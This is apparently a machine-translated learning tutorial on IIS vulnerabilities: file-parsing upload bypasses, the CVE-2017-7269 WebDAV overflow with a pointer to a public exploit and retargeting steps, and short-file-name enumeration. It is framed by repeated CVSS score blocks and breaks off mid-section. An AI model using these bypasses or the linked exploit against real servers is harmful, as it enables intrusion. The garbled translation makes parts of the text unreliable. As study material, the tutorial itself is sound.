9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.7%
! [](/Article/UploadPic/2018-11/20181128231052767. png)
Do the spectators for a long time, found that there has been no better middleware vulnerability of the summary of the article, just recently doing this to learn, this only summarizes a small portion of the middleware common vulnerabilities for learning reference, follow-up will complement the other portion of the common vulnerabilities. If there is an error also please bigwigs correct me.
A, IIS file parsing vulnerability
IIS file parsing vulnerability exists in two versions, one is IIS6. 0 file parsing vulnerability, one is IIS7. 5 file parsing vulnerabilities, the IIS7. 5 file parsing vulnerability principles and IIS6. 0 similarly, because there is a logical problem, this is only for IIS6. 0 file parsing vulnerability analysis. In the Supplement will be on IIS7. 5 file parsing vulnerability differences section for additional instructions.
A vulnerability principles
IIS6. 0 in the treatment containing a special symbol of the path to the file occurs when the logical file name of the directory to test. asp, files in the directory will be used as an asp implementation; suffix. asp;. jpg, when the asp file is executed, the resulting file parsing vulnerability.
II vulnerability presentation and the use of
When the website upload point limit extension when IIS the main and asp mix, you can use file parsing vulnerability upload as test. asp;. jpg file, bypassing after the execution. As shown in Figure 1. 1
! [](/Article/UploadPic/2018-11/20181128231052271. png)
Figure 1. 1
When allowed to create a new directory and not the directory name limit, you can use file parsing vulnerability new named test. asp folder, and in which the structure is required to perform the file iisstart. jpg be bypassed. As shown in Figure 1. 2
! [](/Article/UploadPic/2018-11/20181128231052184. png)
Figure 1. 2
Second, the IIS command execution vulnerability
IIS6. 0 command execution vulnerability number CVE-2017-7269, in the open WebDav service in the case there may be a remote execution vulnerability.
A vulnerability principles
In IIS6. 0 processing PROPFIND command when, due to the length of the url without the effective length of the control and inspection lead to the implementation of memcpy on a virtual path configuration when the trigger Stack Overflow, this vulnerability can lead to remote code execution. As shown in Figure 2. 1
! [](/Article/UploadPic/2018-11/20181128231052174. png)
Figure 2. 1
II vulnerability presentation and the use of
On Github, an open source exp:https://github. com/edwardz246003/IIS_exploit
Modify the IP address not corresponding to the target address, as shown in Figure 2. 2
! [](/Article/UploadPic/2018-11/20181128231052963. png)
Figure 2. 2
Run the script, the attack target machine. As shown in Figure 2. 3
! [](/Article/UploadPic/2018-11/20181128231053587. png)
Figure 2. 3
Third, IIS short file name
IIS short file name vulnerability, by IIS short file name of the mechanism, the violence include the short file name, try to guess the background address, sensitive documents and even directly download the corresponding file. But limited you can only guess the long file name before the 6-bit and the extension prior to 3 bits, while the need for IIS and. net two conditions are met.
A vulnerability principles
The use of IIS short file name of the mechanism, that is, a compatible 16-bit MS-DOS program, Windows for a file name longer-compute a suffix after the file name length is greater than 9 files and folders generated corresponding to the windows 8.3 short file name. You can use this vulnerability to guess the solution of the background address, sensitive documents, etc. As shown in Figure 3. 1
! [](/Article/UploadPic/2018-11/20181128231053697. png)
Figure 3. 1
II vulnerability presentation and the use of
On winserver2003 virtual machine, in the c:/Inetpub/wwwroot directory under the new comparative folder 12345678 and 123456789, comparative file aaaaaa. asp. On the host open the virtual machine IP URL below
Try 10. 10. 10. 132/122~1**/a. asp and 10. 10. 10. 132/123~1/a. asp; to give a different result as shown in Figure 3. 2, Figure 3. 3. the
! [](/Article/UploadPic/2018-11/20181128231053148. png)
Figure 3. 2
! [](/Article/UploadPic/2018-11/20181128231053198. png)
Figure 3. 3
Through the above two figure we can see that, according to the return result can be different one by one guess the short file name.
Then try again 10. 10. 10. 132/aaaaaa~1/a. asp(guess no suffix, the normal return for the folder and 10. 10. 10. 132/aaaaaa~1/a. asp(guess for the file. As shown in Figure 3. 4, Figure 3. 5。
! [](/Article/UploadPic/2018-11/20181128231053399. png)
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.971 High
EPSS
Percentile
99.7%